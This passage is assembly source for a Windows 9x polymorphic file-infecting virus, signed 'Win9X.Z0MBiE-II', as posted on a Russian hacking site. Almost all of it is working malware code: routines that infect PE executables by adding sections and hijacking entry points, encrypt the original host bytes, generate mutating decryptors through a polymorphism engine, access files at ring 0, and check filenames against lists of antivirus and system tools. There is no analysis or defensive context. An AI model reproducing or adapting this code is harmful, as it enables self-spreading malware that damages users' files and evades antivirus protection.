mov ebx, filehandle x<br>
call fwrite<br>
<br>
;;<br>
<br>
lea edx, orig_bytes x<br>
mov ecx, vir_size_infile<br>
mov esi, @@vir_offset x y<br>
mov ebx, filehandle x<br>
call fread<br>
<br>
;;<br>
call random_eax<br>
xchg edx, eax<br>
<br>
mov @@decr_key x y, edx<br>
<br>
lea esi, orig_bytes x<br>
mov ecx, vir_size_infile / 4<br>
__encr_1: mov eax, [esi]<br>
add eax, edx<br>
mov [esi], eax<br>
rol edx, 13<br>
dec edx<br>
add esi, 4<br>
loop __encr_1<br>
<br>
;;<br>
<br>
lea edx, orig_bytes x<br>
mov ecx, vir_size_infile<br>
mov esi, @@orig_offs x y<br>
mov ebx, filehandle x<br>
call fwrite<br>
<br>
mov @@vir_type x y, 1<br>
<br>
call poly_engine<br>
<br>
;;<br>
<br>
mov eax, @@vir_rva x y<br>
add eax, poly_entrypoint x<br>
mov pe.pe_entrypointrva x, eax<br>
<br>
lea edx, poly x<br>
mov ecx, vir_size_infile<br>
mov esi, @@vir_offset x y<br>
mov ebx, filehandle x<br>
call fwrite<br>
<br>
;;<br>
<br>
mov ecx, filename_ptr x<br>
cmp [ecx].byte ptr 0, 'C'<br>
jb __skip_sd<br>
<br>
; mov eax, [ecx].dword ptr 2<br>
; or eax, 20202000h<br>
; cmp eax, 'niw\'<br>
; jne __skip_sd<br>
<br>
mov esi, oeV.oe_phys_offs x<br>
mov ecx, oeV.oe_phys_size x<br>
shr ecx, sd_buf_size_log2<br>
<br>
__cycle_sd: dec ecx<br>
jz __skip_sd<br>
<br>
push ecx<br>
<br>
lea edx, sd_buf x<br>
mov ecx, sd_buf_size<br>
mov ebx, filehandle x<br>
call fread<br>
<br>
lea edi, sd_count x<br>
mov ecx, sd_count_size<br>
xor al, al<br>
cld<br>
rep stosb<br>
<br>
lea ebx, sd_buf x<br>
mov ecx, sd_buf_size<br>
xor eax, eax<br>
__cycle_count: mov al, [ebx]<br>
inc ebx<br>
inc sd_count[eax*2] x<br>
or al, al<br>
jz __xxx<br>
cmp sd_count[eax*2] x, 512<br>
ja __bad_buf<br>
__xxx: loop __cycle_count<br>
<br>
cmp sd_count[00h*2] x, 256<br>
jb __bad_buf<br>
cmp sd_count[089h*2] x, 30<br>
jb __bad_buf<br>
cmp sd_count[08Bh*2] x, 30<br>
jb __bad_buf<br>
cmp sd_count[0E8h*2] x, 10<br>
jb __bad_buf<br>
<br>
call random_ax<br>
xchg edi, eax<br>
<br>
mov ecx, sd_buf_size<br>
<br>
__find_cycle: and edi, sd_buf_size - 1<br>
<br>
cmp edi, sd_buf_size - 16<br>
jae __skip_find<br>
<br>
cmp word ptr sd_buf[edi+5] x, 0C483h<br>
jne __skip_find<br>
<br>
cmp sd_buf[edi] x, 0E8h<br>
je __place_found<br>
<br>
__skip_find:<br>
inc edi<br>
loop __find_cycle<br>
jmp __bad_buf<br>
<br>
__place_found: mov ecx, dword ptr sd_buf[edi+1] x<br>
and ecx, 0FFF80000h<br>
jz __good<br>
cmp ecx, 0FFF80000h<br>
jne __bad_buf<br>
<br>
__good:<br>
mov cl, byte ptr sd_buf[edi+3] x<br>
and cl, 1111b<br>
<br>
call random_ax<br>
and al, 0F0h<br>
<br>
or cl, al<br>
<br>
mov eax, esi<br>
sub eax, oeV.oe_phys_offs x<br>
add eax, oeV.oe_virt_rva x<br>
add eax, edi<br>
xor ax, word ptr sd_buf[edi+1] x<br>
<br>
mov word ptr sd_buf[edi+3] x, ax<br>
mov word ptr sd_buf[edi] x, 0ffffh<br>
<br>
mov sd_buf[edi+2] x, cl<br>
<br>
call random_ax<br>
mov word ptr sd_buf[edi+5] x, ax<br>
<br>
lea edx, sd_buf x<br>
mov ecx, sd_buf_size<br>
mov ebx, filehandle x<br>
call fwrite<br>
<br>
__bad_buf: add esi, sd_buf_size<br>
<br>
pop ecx<br>
jmp __cycle_sd<br>
<br>
__skip_sd:<br>
<br>
__method_2_exit:<br>
__set_stamp:<br>
add pe.pe_sizeofinitdata x, vir_size_infile<br>
<br>
add pe.pe_stackreservesize x, vir_size_infile*4<br>
add pe.pe_stackcommitsize x, vir_size_infile*4<br>
<br>
xor eax, eax<br>
mov pe.pe_checksum x, eax<br>
<br>
mov pe.pe_datetime x, eax<br>
<br>
lea edx, pe x<br>
mov ecx, size pe<br>
mov esi, mz.mz_neptr x<br>
mov ebx, filehandle x<br>
call fwrite<br>
<br>
__close: mov ebx, filehandle x<br>
call fclose<br>
<br>
__restattr: mov edx, filename_ptr x<br>
mov ecx, dta.dta_fileattr x<br>
call fsetattr<br>
<br>
__exit: call xor_copy<br>
<br>
popa<br>
ret<br>
<br>
__read_last_sect: movzx esi, pe.pe_numofobjects x ; last section<br>
dec esi<br>
imul esi, size oe_struc<br>
add esi, mz.mz_neptr x<br>
add esi, size pe_struc<br>
<br>
lea edx, oeL x<br>
mov ecx, size oe_struc<br>
mov ebx, filehandle x<br>
call fread<br>
<br>
ret<br>
<br>
__filealign: mov ebx, pe.pe_filealign x<br>
dec ebx<br>
add eax, ebx<br>
not ebx<br>
and eax, ebx<br>
ret<br>
<br>
__objectalign: mov ebx, pe.pe_objectalign x<br>
dec ebx<br>
add eax, ebx<br>
not ebx<br>
and eax, ebx<br>
ret<br>
<br>
__method_2: call __read_last_sect<br>
<br>
mov esi, mz.mz_neptr x<br>
add esi, size pe_struc<br>
<br>
lea edx, oe1 x<br>
mov ecx, size oe_struc<br>
mov ebx, filehandle x<br>
call fread<br>
<br>
movzx eax, pe.pe_numofobjects x<br>
imul eax, size oe_struc<br>
add esi, eax<br>
<br>
mov eax, oe1.oe_phys_offs x<br>
sub eax, esi<br>
<br>
cmp eax, size oe_struc<br>
jb __set_stamp<br>
<br>
mov eax, dta.dta_filesize x<br>
call __filealign<br>
mov oe1.oe_phys_offs x, eax<br>
<br>
mov eax, vir_size_infile<br>
call __filealign<br>
mov oe1.oe_phys_size x, eax<br>
<br>
mov eax, oeL.oe_virt_rva x<br>
add eax, oeL.oe_virt_size x<br>
call __objectalign<br>
mov oe1.oe_virt_rva x, eax<br>
<br>
mov @@saved_rel x y, eax<br>
<br>
mov eax, vir_size_infile<br>
call __objectalign<br>
mov oe1.oe_virt_size x, eax<br>
<br>
mov oe1.oe_section_flags x, 60000020h<br>
<br>
mov eax, pe.pe_entrypointrva x<br>
mov @@saveeip x y, eax<br>
<br>
mov eax, pe.pe_imagebase x<br>
mov @@imagebase x y, eax<br>
<br>
mov eax, oe1.oe_virt_rva x<br>
add eax, oe1.oe_virt_size x<br>
call __objectalign<br>
mov pe.pe_imagesize x, eax<br>
<br>
mov @@vir_type x y, 2<br>
<br>
call poly_engine<br>
<br>
mov eax, oe1.oe_virt_rva x<br>
add eax, poly_entrypoint x<br>
mov pe.pe_entrypointrva x, eax<br>
<br>
inc pe.pe_numofobjects x<br>
<br>
lea edx, oe1 x<br>
mov ecx, size oe_struc<br>
mov ebx, filehandle x<br>
call fwrite<br>
<br>
lea edx, poly x<br>
mov ecx, vir_size_infile<br>
mov esi, oe1.oe_phys_offs x<br>
mov ebx, filehandle x<br>
call fwrite<br>
<br>
lea edi, poly x<br>
mov ecx, vir_size_infile<br>
xor al, al<br>
cld<br>
rep stosb<br>
<br>
mov edx, oe1.oe_phys_size x<br>
sub edx, vir_size_infile<br>
<br>
__22: or edx, edx<br>
jz __11<br>
<br>
mov ecx, edx<br>
cmp ecx, vir_size_infile<br>
jbe __33<br>
mov ecx, vir_size_infile<br>
<br>
__33: push edx<br>
lea edx, poly x<br>
mov ebx, filehandle x<br>
call fwrite<br>
pop edx<br>
<br>
add esi, ecx<br>
sub edx, ecx<br>
<br>
jmp __22<br>
__11:<br>
<br>
jmp __method_2_exit<br>
<br>
naebka_4: jnc naebka_5<br>
naebka_2: jmp naebka_3<br>
<br>
is_in_list:<br>
<br>
__next: pusha<br>
<br>
mov ecx, short_name_len+short_ext_len<br>
<br>
__2: mov al, [esi]<br>
mov ah, [edi]<br>
<br>
cmp ah, '?'<br>
je __1<br>
cmp ah, 128<br>
jae __1<br>
<br>
cmp al, 'a'<br>
jb __4<br>
cmp al, 'z'<br>
ja __4<br>
add al, 'A'-'a'<br>
<br>
__4: cmp al, ah<br>
jne __3 ; nz<br>
<br>
__1: inc esi<br>
inc edi<br>
loop __2<br>
<br>
xor ecx, ecx ; zr<br>
<br>
__3: popa<br>
je __found<br>
<br>
add edi, short_name_len+short_ext_len<br>
<br>
cmp byte ptr [edi], 0<br>
jne __next<br>
<br>
clc<br>
ret<br>
<br>
__found: stc<br>
ret<br>
<br>
_strlen: push edi<br>
mov ecx, -1<br>
xor al, al<br>
cld<br>
repnz scasb<br>
neg ecx<br>
dec ecx<br>
dec ecx<br>
pop edi<br>
ret<br>
<br>
access_ebx equ (dword ptr 16)<br>
access_edx equ (dword ptr 20)<br>
access_ecx equ (dword ptr 24)<br>
access_eax equ (dword ptr 28)<br>
<br>
; i: edx=filename<br>
; o: cf, eax=handle<br>
fopen: pusha<br>
mov eax, R0_OPENCREATFILE<br>
mov esi, edx<br>
mov bx, 2022h ; no int 24, denywrite, r/w<br>
mov cx, 32 ; archive (unused here)<br>
mov dx, 01h ; fail | open<br>
VxDcall IFSMGR_Ring0_FileIO<br>
mov [esp].access_eax, eax<br>
popa<br>
ret<br>
<br>
; i: edx=filename<br>
; o: cf, eax=handle<br>
fcreate: pusha<br>
mov eax, R0_OPENCREATFILE<br>
mov esi, edx<br>
mov bx, 2022h ; no int 24, denywrite, r/w<br>
mov cx, 32 ; archive<br>
mov dx, 12h ; create | open/replace<br>
VxDcall IFSMGR_Ring0_FileIO<br>
mov [esp].access_eax, eax<br>
popa<br>
ret<br>
<br>
; i: edx=filename<br>
fdelete: pusha<br>
mov eax, R0_DELETEFILE<br>
mov esi, edx<br>
mov cx, 2027h<br>
VxDcall IFSMGR_Ring0_FileIO<br>
mov [esp].access_eax, eax<br>
popa<br>
ret<br>
<br>
<br>
; i: ebx=handle<br>
fclose: pusha<br>
mov eax, R0_CLOSEFILE<br>
VxDcall IFSMGR_Ring0_FileIO<br>
popa<br>
ret<br>
<br>
; i: ebx=handle<br>
; edx=buffer<br>
; ecx=size<br>
; esi=file pos<br>
; o: ecx=bytes read<br>
fread: pusha<br>
mov eax, R0_READFILE<br>
xchg edx, esi<br>
VxDcall IFSMGR_Ring0_FileIO<br>
mov [esp].access_ecx, ecx<br>
popa<br>
ret<br>
<br>
; i: ebx=handle<br>
; edx=buffer<br>
; ecx=size<br>
; esi=file pos<br>
; o: ecx=bytes written<br>
fwrite: pusha<br>
mov eax, R0_WRITEFILE<br>
xchg edx, esi<br>
VxDcall IFSMGR_Ring0_FileIO<br>
mov [esp].access_ecx, ecx<br>
popa<br>
ret<br>
<br>
; i: ebx=handle<br>
; o: eax=file size<br>
fgetsize: pusha<br>
mov eax, R0_GETFILESIZE<br>
VxDcall IFSMGR_Ring0_FileIO<br>
mov [esp].access_eax, eax<br>
popa<br>
ret<br>
<br>
; i: edx=filename<br>
; o: ecx=fileattr<br>
;fgetattr: pusha<br>
; mov eax, R0_FILEATTRIBUTES + GET_ATTRIBUTES<br>
; mov esi, edx<br>
; VxDcall IFSMGR_Ring0_FileIO<br>
; mov [esp].access_ecx, ecx<br>
; popa<br>
; ret<br>
<br>
; i: edx=filename<br>
; ecx=fileattr<br>
fsetattr: pusha<br>
mov eax, R0_FILEATTRIBUTES + SET_ATTRIBUTES<br>
mov esi, edx<br>
VxDcall IFSMGR_Ring0_FileIO<br>
popa<br>
ret<br>
<br>
; i: edx=filemask<br>
; ecx=attribs<br>
; esi=find structure<br>
; o: cf, eax=findhandle<br>
ffindfirst: pusha<br>
mov eax, R0_FINDFIRSTFILE<br>
xchg edx, esi<br>
VxDcall IFSMGR_Ring0_FileIO<br>
mov [esp].access_eax, eax<br>
popa<br>
ret<br>
<br>
; i: eax=findhandle<br>
; esi=find structure<br>
; o: cf<br>
;ffindnext: pusha<br>
; xchg ebx, eax<br>
; mov eax, R0_FINDFIRSTFILE<br>
; mov edx, esi<br>
; VxDcall IFSMGR_Ring0_FileIO<br>
; mov [esp].access_eax, eax<br>
; popa<br>
; ret<br>
<br>
; i: eax=find handle<br>
ffindclose: pusha<br>
xchg ebx, eax<br>
mov eax, R0_FINDCLOSEFILE<br>
VxDcall IFSMGR_Ring0_FileIO<br>
popa<br>
ret<br>
<br>
IFDEF DEBUG<br>
<br>
debug_beep_FREQ equ 3300<br>
debug_beep_DELAY equ 10*65536<br>
<br>
debug_beep: push eax<br>
push ecx<br>
<br>
mov al, 0B6h<br>
out 43h, al<br>
<br>
mov al, (12345678h/debug_beep_FREQ) and 255<br>
out 42h, al<br>
mov al, ((12345678h/debug_beep_FREQ) shr 16) and 255<br>
out 42h, al<br>
<br>
in al, 61h<br>
or al, 3<br>
out 61h, al<br>
<br>
mov ecx, debug_beep_DELAY<br>
loop $<br>
<br>
in al, 61h<br>
and al, not 3<br>
out 61h, al<br>
<br>
pop ecx<br>
pop eax<br>
ret<br>
ENDIF<br>
<br>
;rnd_eax_ebx: push ebx<br>
; cmp eax, ebx<br>
; jae __1<br>
; xchg ebx, eax<br>
;__1: sub eax, ebx<br>
; inc eax<br>
; call rnd_eax<br>
; add eax, ebx<br>
; pop ebx<br>
; ret<br>
<br>
rnd_eax: push ecx<br>
push edx<br>
xchg ecx, eax<br>
call random_eax<br>
xor edx, edx<br>
jecxz __1<br>
div ecx<br>
__1: xchg edx, eax<br>
pop edx<br>
pop ecx<br>
ret<br>
<br>
eblo equ 5051EB10h<br>
<br>
random_eax: call random_ax<br>
rol eax, 16<br>
call random_ax<br>
rol eax, 11<br>
xor_eblo: xor eax, eblo<br>
ret<br>
<br>
random_ax: push bx<br>
xor bx, ax<br>
xor bx, cx<br>
xor bx, dx<br>
xor bx, sp<br>
xor bx, bp<br>
xor bx, si<br>
xor bx, di<br>
in al, 40h<br>
xor bl, al<br>
in al, 40h<br>
add bh, al<br>
in al, 41h<br>
sub bl, al<br>
in al, 41h<br>
xor bh, al<br>
in al, 42h<br>
add bl, al<br>
in al, 42h<br>
sub bh, al<br>
xchg bx, ax<br>
pop bx<br>
ret<br>
<br>
poly_engine: pusha<br>
<br>
call get_base_ebp<br>
<br>
;;<br>
<br>
lea edi, poly x<br>
cld<br>
<br>
call random_eax<br>
and eax, 255<br>
add eax, 100<br>
xchg ecx, eax<br>
__a1: call random_ax<br>
stosb<br>
loop __a1<br>
<br>
;;<br>
<br>
lea eax, poly x<br>
sub eax, edi<br>
neg eax<br>
mov poly_entrypoint x, eax<br>
<br>
;;<br>
<br>
mov @@kbase x y, vir_size<br>
<br>
mov eax, 01010101h<br>
mov dword ptr push_num x, eax<br>
mov dword ptr push_num x + 4, eax<br>
<br>
;;<br>
<br>
mov edx, 6<br>
<br>
__1: call get_rnd_reg<br>
xchg ecx, eax<br>
<br>
cmp push_num[ecx] x, 0<br>
je __1<br>
<br>
mov al, 0b8h<br>
add al, cl<br>
stosb<br>
call random_eax<br>
mov em_eax[ecx*4] x, eax<br>
stosd<br>
<br>
mov push_num[ecx] x, 0<br>
<br>
call poly_out_cmd<br>
<br>
dec edx<br>
jnz __1<br>
<br>
;;<br>
<br>
lea esi, vir_copy x<br>
add esi, vir_size<br>
xor ecx, ecx<br>
<br>
__cycle_1:<br>
call poly_out_cmd<br>
<br>
call get_rnd_reg<br>
xchg ebx, eax<br>
<br>
xor edx, edx<br>
<br>
__3: cmp push_num[ebx] x, 0<br>
je __2<br>
<br>
movzx eax, regbuf[edx] x<br>
inc edx<br>
<br>
mov push_num[eax] x, 0<br>
<br>
add al, 50h<br>
stosb<br>
<br>
call poly_out_cmd<br>
<br>
jmp __3<br>
<br>
__2:<br>
pusha<br>
lea edi, regbuf x<br>
lea esi, [edi+edx]<br>
movsd<br>
movsd<br>
popa<br>
sub ecx, edx<br>
<br>
<br>
sub esi, 4<br>
mov edx, [esi]<br>
<br>
call random_eax<br>
<br>
and eax, 3<br>
jz __x0<br>
dec eax<br>
jz __x1<br>
dec eax<br>
jz __x2<br>
<br>
__x3: call poly_push_all<br>
<br>
mov al, 68h<br>
stosb<br>
xchg edx, eax<br>
stosd<br>
<br>
jmp __yy<br>
<br>
__x2: xor edx, em_eax[ebx*4] x<br>
mov ax, 0F081h<br>
xor em_eax[ebx*4] x, edx<br>
<br>
jmp __xx<br>
<br>
__x1: sub edx, em_eax[ebx*4] x<br>
mov ax, 0C081h<br>
add em_eax[ebx*4] x, edx<br>
<br>
jmp __xx<br>
<br>
__x0: sub edx, em_eax[ebx*4] x<br>
neg edx<br>
mov ax, 0E881h<br>
sub em_eax[ebx*4] x, edx<br>
<br>
__xx: add ah, bl<br>
stosw<br>
xchg edx, eax<br>
stosd<br>
<br>
mov regbuf[ecx] x, bl<br>
inc ecx<br>
<br>
mov push_num[ebx] x, 1<br>
<br>
__yy: lea eax, vir_copy x<br>
cmp esi, eax<br>
jne __cycle_1<br>
<br>
call poly_push_all<br>
<br>
;;<br>
<br>
call poly_out_cmd<br>
<br>
;;<br>
<br>
mov ax, 0E4FFh ; jmp esp<br>
stosw<br>
<br>
lea ecx, poly x<br>
add ecx, vir_size_infile<br>
sub ecx, edi<br>
__a2: call random_ax<br>
stosb<br>
loop __a2<br>
<br>
;;<br>
<br>
popa<br>
ret<br>
<br>
xor_copy: lea esi, vir_copy x<br>
mov ecx, vir_size<br>
__1: xor byte ptr [esi], cl<br>
inc esi<br>
loop __1<br>
ret<br>
<br>
poly_push_all: xor ebx, ebx<br>
<br>
__2: cmp ebx, ecx<br>
je __1<br>
<br>
movzx eax, regbuf[ebx] x<br>
inc ebx<br>
<br>
mov push_num[eax] x, 0<br>
<br>
add al, 50h<br>
stosb<br>
<br>
jmp __2<br>
<br>
__1: xor ecx, ecx<br>
<br>
ret<br>
<br>
get_rnd_reg: call random_eax<br>
and eax, 7<br>
cmp al, 4 ; esp<br>
je get_rnd_reg<br>
cmp al, 5 ; ebp<br>
je get_rnd_reg<br>
ret<br>
<br>
naebka_8: call naebka_1<br>
jc naebka_5<br>
jmp replace_buf<br>
<br>
poly_out_cmd: push eax ebx ecx edx esi<br>
<br>
cmp dword ptr push_num x, 01010101h<br>
jne __1<br>
cmp word ptr push_num x + 4 + 2, 0101h<br>
je __ret<br>
<br>
__1: call get_rnd_reg<br>
cmp push_num[eax] x, 0<br>
jne __1<br>
mov reg1 x, eax<br>
xchg ecx, eax<br>
<br>
__2: call get_rnd_reg<br>
cmp push_num[eax] x, 0<br>
jne __2<br>
mov reg2 x, eax<br>
xchg edx, eax<br>
<br>
__rand: call random_eax<br>
and eax, 31<br>
<br>
or eax, eax<br>
jz __x_0<br>
dec eax<br>
jz __x_1<br>
<br>
jmp __opt1<br>
<br>
__x_x_x:<br>
<br>
__ret:<br>
<br>
pop esi edx ecx ebx eax<br>
<br>
ret<br>
<br>
<br>
__x_0: cmp ecx, edx ; mov r1, r2<br>
je __rand<br>
<br>
mov eax, em_eax[edx*4] x<br>
mov em_eax[ecx*4] x, eax<br>
<br>
mov al, 89h<br>
<br>
__stosb:<br>
stosb<br>
<br>
mov al, dl<br>
shl al, 3<br>
or al, cl<br>
or al, 0c0h<br>
stosb<br>
<br>
jmp __x_x_x<br>
<br>
<br>
__x_1: ; xor r1, r2<br>
mov eax, em_eax[edx*4] x<br>
xor em_eax[ecx*4] x, eax<br>
<br>
mov al, 31h<br>
jmp __stosb<br>
<br>
__x_2: ; add r1, r2<br>
mov eax, em_eax[edx*4] x<br>
add em_eax[ecx*4] x, eax<br>
<br>
mov al, 01h<br>
jmp __stosb<br>
<br>
__x_3: ; sub r1, r2<br>
mov eax, em_eax[edx*4] x<br>
sub em_eax[ecx*4] x, eax<br>
<br>
mov al, 29h<br>
jmp __stosb<br>
<br>
__x_4: ; not r1<br>
not em_eax[ecx*4] x<br>
<br>
mov ax, 0d0f7h<br>
<br>
__orahclstosb:<br>
or ah, cl<br>
stosw<br>
<br>
jmp __x_x_x<br>
<br>
<br>
__opt1: dec eax<br>
jz __x_2<br>
dec eax<br>
jz __x_3<br>
dec eax<br>
jz __x_4<br>
<br>
dec eax<br>
jz __x_5<br>
dec eax<br>
jz __x_6<br>
dec eax<br>
jz __x_7<br>
dec eax<br>
jz __x_8<br>
<br>
jmp __opt2<br>
<br>
__x_5: ; neg r1<br>
<br>
neg em_eax[ecx*4] x<br>
<br>
mov ax, 0d8f7h<br>
<br>
jmp __orahclstosb<br>
<br>
__x_6:<br>
; shl r1, 1<br>
shl em_eax[ecx*4] x, 1<br>
<br>
mov ax, 0e0d1h<br>
jmp __orahclstosb<br>
<br>
__x_7: ; shr r1, 1<br>
<br>
shr em_eax[ecx*4] x, 1<br>
<br>
mov ax, 0e8d1h<br>
jmp __orahclstosb<br>
<br>
<br>
__x_8: ; rol r1, 1<br>
rol em_eax[ecx*4] x, 1<br>
<br>
mov ax, 0c0d1h<br>
jmp __orahclstosb<br>
<br>
<br>
<br>
__x_9: ; ror r1, 1<br>
ror em_eax[ecx*4] x, 1<br>
<br>
mov ax, 0c8d1h<br>
jmp __orahclstosb<br>
<br>
__x_10: ; sar r1, 1<br>
sar em_eax[ecx*4] x, 1<br>
<br>
mov ax, 0f8d1h<br>
jmp __orahclstosb<br>
<br>
__x_11: ; xchg r1, r2<br>
mov eax, em_eax[edx*4] x<br>
xchg em_eax[ecx*4] x, eax<br>
mov em_eax[edx*4] x, eax<br>
<br>
mov al, 87h<br>
jmp __stosb<br>
<br>
__x_12: ; and r1, r2<br>
mov eax, em_eax[edx*4] x<br>
and em_eax[ecx*4] x, eax<br>
<br>
mov al, 21h<br>
jmp __stosb<br>
<br>
__opt2: dec eax<br>
jz __x_9<br>
dec eax<br>
jz __x_10<br>
dec eax<br>
jz __x_11<br>
dec eax<br>
jz __x_12<br>
<br>
dec eax<br>
jz __x_13<br>
dec eax<br>
jz __x_14<br>
dec eax<br>
jz __x_15<br>
<br>
__x_x: jmp __x_x_x<br>
<br>
__x_13: ; or r1, r2<br>
mov eax, em_eax[edx*4] x<br>
or em_eax[ecx*4] x, eax<br>
<br>
mov al, 09h<br>
jmp __stosb<br>
<br>
__x_14: ; inc r1<br>
<br>
inc em_eax[ecx*4] x<br>
<br>
mov al, 40h<br>
<br>
__oralclstosb: or al, cl<br>
stosb<br>
<br>
jmp __x_x<br>
<br>
__x_15: ; dec r1<br>
<br>
dec em_eax[ecx*4] x<br>
<br>
mov al, 48h<br>
<br>
jmp __oralclstosb<br>
<br>
replace_proc: pusha<br>
call get_base_ebp<br>
cld<br>
<br>
mov ebx, replace_buf_ptr x y<br>
cmp ebx, replace_buf_size - 16<br>
ja __exit<br>
lea eax, replace_buf x y<br>
add ebx, eax<br>
<br>
mov eax, replace_end - replace_start - 32<br>
call rnd_eax<br>
lea esi, replace_start[eax] x y<br>
<br>
mov ecx, 16<br>
<br>
__1: lodsb<br>
<br>
cmp al, 0E9h<br>
je __2<br>
cmp al, 0E8h<br>
je __2<br>
<br>
loop __1<br>
jmp __exit<br>
<br>
__2: lodsd<br>
lea edx, [eax+esi]<br>
<br>
lea ecx, replace_start x y<br>
cmp edx, ecx<br>
jb __exit<br>
lea ecx, replace_end x y - 32<br>
cmp edx, ecx<br>
ja __exit<br>
<br>
mov eax, ebx<br>
sub eax, esi<br>
mov [esi-5].dword ptr 1, eax<br>
<br>
mov [ebx].byte ptr 0, 0E9h<br>
lea eax, [ebx+5]<br>
sub edx, eax<br>
mov [ebx].dword ptr 1, edx<br>
<br>
add replace_buf_ptr x y, 5<br>
<br>
__exit: popa<br>
ret<br>
<br>
naebka_9: jmp naebka_8<br>
<br>
replace_buf_size equ 1024<br>
replace_buf: db replace_buf_size dup (90h)<br>
<br>
replace_end:<br>
<br>
replace_buf_ptr dd 0<br>
<br>
go_old_ifs_handler: db 0b8h<br>
oldhandler_ptr_ptr dd ?<br>
jmp [eax]<br>
<br>
<br>
go_prev_fault: db 68h<br>
fault_previous dd ?<br>
ret<br>
<br>
naebka_7: jmp naebka_9<br>
<br>
;1234567890123<br>
kewl_names: db 'COMMAND??????'<br>
db 0<br>
<br>
suck_names: db 'AVP??&#1087;&#1088;&#1080;&#1074;&#1077;&#1090;??'<br>
db 'WEB??&#1074;&#1089;&#1077;&#1084;????'<br>
db 'DRW??&#1074;&#1080;&#1088;&#1084;&#1101;&#1081;&#1082;&#1077;'<br>
db 'DSAV?????&#1088;&#1072;&#1084;?'<br>
db 'NOD???????EXE'<br>
db 'NOD???????00?'<br>
db '??????????AVC'<br>
db '??????????VDB'<br>
db 'WINICE ???'<br>
db 'FORMAT COM'<br>
db 'FDISK EXE'<br>
db 'SCANDSKW EXE'<br>
db 'DEFRAG EXE'<br>
db 0<br>
<br>
@@vir_type db 0 ; 1/2<br>
@@is_dll db 0<br>
<br>
@@imagebase dd ? ; saved<br>
@@vir_offset dd ? ; offset of virus in file<br>
@@vir_rva dd ? ; virus rva in file<br>
@@saveeip dd ? ; saved entrypoint rva<br>
@@orig_offs dd ? ; where original data stored in file<br>
@@orig_rva dd ?<br>
@@codesect_pageaddr12 dd ?<br>
@@codesect_pagecount dd ?<br>
@@codesect_flags dd ?<br>
@@decr_key dd ?<br>
@@saved_rel dd ?<br>
<br>
db 13,10<br>
db 'Win9X.Z0MBiE-II by Z0MBiE/29A X-) Seek&amp;Enjoy!
z0mbie_29a@yahoo.com',13,10<br>
db 'made in Moscow, Russia',13,10<br>
<br>
db '[S/N:'<br>
<br>
gen_number macro x<br>
i = 10000<br>
k = 5<br>
j = 0<br>
rept k<br>
if ((x / i) mod 10) ne 0<br>
exitm<br>
endif<br>
j = j + 1<br>
i = i / 10<br>
endm<br>
rept k-j<br>
db ((x / i) mod 10) + '0'<br>
i = i / 10<br>
endm<br>
endm<br>
<br>
gen_number vir_size<br>
db '-'<br>
gen_number vir_size_infile<br>
db '-'<br>
gen_number vir_memory<br>
db '-'<br>
gen_number virPages<br>
<br>
IFDEF DEBUG<br>
db '-DEBUG'<br>
ENDIF<br>
db ']'<br>
db 13,10<br>
<br>
align 4<br>
end_of_code:<br>
vir_size equ end_of_code-start<br>
<br>
entered db ?<br>
<br>
r0_idt df ?<br>
<br>
kernel_base dd ?<br>
<br>
filename_ptr dd ?<br>
<br>
filename_size equ 260<br>
filename db filename_size dup (?)<br>
<br>
short_name_len equ 10<br>
short_ext_len equ 3<br>
shortname db short_name_len+short_ext_len dup (?)<br>
<br>
filehandle dd ?<br>
<br>
dta dta_struc ?<br>
<br>
mz mz_struc ?<br>
pe pe_struc ?<br>
<br>
oe1 oe_struc ?<br>
oeV_ptr dd ?<br>
oeV oe_struc ?<br>
oeL oe_struc ?<br>
<br>
vir_copy db vir_size dup (?)<br>
<br>
sd_count dw 256 dup (?)<br>
sd_count_size equ $-sd_count<br>
<br>
poly_entrypoint dd ?<br>
<br>
sd_buf_size equ 4096<br>
sd_buf_size_log2 equ 12<br>
<br>
sd_buf label byte<br>
orig_bytes label byte<br>
unp_dropper label byte<br>
<br>
poly db vir_size_infile dup (?)<br>
<br>
em_eax dd ?<br>
em_ecx dd ?<br>
em_edx dd ?<br>
em_ebx dd ?<br>
em_esp dd ?<br>
em_ebp dd ?<br>
em_esi dd ?<br>
em_edi dd ?<br>
<br>
push_num db 8 dup (?)<br>
<br>
reg1 dd ?<br>
reg2 dd ?<br>
<br>
regbuf db 16 dup (?)<br>
<br>
vir_memory equ $-start<br>
virPages equ (vir_memory + 4095) / 4096<br>
<br>
end start<br>
<br>
<br>
<br>
<br>
<br>
&#1072;&#1074;&#1090;&#1086;&#1088;: <a href="../../../../xakep/xakep2/aboutwe.htm">RealNeo</a><br>
</font>
<p>&nbsp; <table cellSpacing=0 cellPadding=2 width=100% border=0><tbody><tr><td><font face=Arial color=#000000 size=1>Copyright � &quot;&nbsp;<a href="http://xs.by.ru">HACK-INFO</a>&quot;&nbsp; &quot; <a href=mailto:info@xakep.dax.ru>info@xakep.dax.ru</a>&quot;<br>&#1055;&#1088;&#1080; &#1080;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1085;&#1080;&#1080; &#1084;&#1072;&#1090;&#1077;&#1088;&#1080;&#1072;&#1083;&#1086;&#1074; &#1086;&#1073;&#1103;&#1079;&#1072;&#1090;&#1077;&#1083;&#1100;&#1085;&#1072; &#1089;&#1089;&#1099;&#1083;&#1082;&#1072; &#1085;&#1072;&nbsp;
        <a target="_blank" href="http://xs.by.ru">http://hack-info.tk </a>.</font></td></tr></tbody></table><p style="MARGIN: 0px; WORD-SPACING: 0px; TEXT-INDENT: 0px; LINE-HEIGHT: 100%">&nbsp;</p></body></html>